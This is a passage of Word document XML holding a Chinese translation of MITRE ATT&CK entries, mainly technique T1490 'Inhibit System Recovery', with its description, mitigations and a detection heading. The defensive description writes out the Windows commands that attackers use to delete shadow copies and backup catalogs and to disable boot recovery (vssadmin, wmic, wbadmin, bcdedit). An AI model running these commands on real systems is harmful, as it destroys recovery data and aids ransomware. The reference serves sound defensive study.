              <w:t>防止攻击特权帐户或更换系统固件所需的访问权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00C71286" w14:paraId="160D9339" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F3CC6A2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C71286" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799CF91C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C71286" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>根据需要修补</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和其他固件，以防止使用已知漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21D5A27D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC75268" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B10DB6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00387142" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测系统固件操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行为</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并与已知的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修补行为进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B67E638" w14:textId="7FBA0973" w:rsidR="00A0413E" w:rsidRDefault="00567ECD" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统恢复</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="01107CA3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF7C9C8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> T1490</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C04FCE3" w14:textId="1F098F85" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶劣</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0666546E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> Windows, macOS, Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC1A9C6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069AD20C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表，服务，</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时间日志，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C78C3EA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4000D2A2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t>: Yonatan Gotlib, Deep Instinct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9D569B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="708A244C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00387142" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9F6274" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00597B4B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00597B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会删除或删除内置操作系统数据，并关闭旨在帮助恢复已损坏系统的服务。操作系统可能包含可帮助修复损坏系统的功能，例如备份目录，卷副本和自动修复功能。攻击者可以禁用或删除系统恢复功能，以增强数据销毁和数据加密的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439108A2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00597B4B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00597B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多本机</w:t>
      </w:r>
      <w:r w:rsidRPr="00597B4B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00597B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00597B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用来禁用或删除系统恢复功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04F882" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00AD0E34" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>vssadmin.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0E34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于删除系统上的所有卷影副本</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0E34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0E34">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>vssadmin.exe delete shadows /all /quiet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE5BE9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00AD0E34" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006634EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="006634EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于删除卷影副本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0E34">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wmic shadowcopy delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D8B477" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00347B9D" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wbadmin.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wbadmin.exe delete catalog -quiet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58900342" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00347B9D" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>bcdedit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于修改引导配置数据来禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00347B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动恢复功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>bcdedit.exe /set {{default}} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {{default}} recoveryenabled no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9E680" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1834"/>
        <w:gridCol w:w="7902"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="0A4E9B9D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6D6C8913" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="77D3902A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="124B7F34" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B48F5C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据备份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DEC6E2D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>灾难恢复计划，其中包含用于执行可用于还原组织数据的常规数据备份的过程。</w:t>
            </w:r>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保备份存储在系统之外，并受到保护，以防止攻击者可能使用常用方法获取访问权限并销毁备份以防止恢复。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="16ADDA10" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="619"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="755BB2F9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59EDE66D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00597B4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑技术控制以防止禁用服务或删除系统恢复中涉及的文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="269351F5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
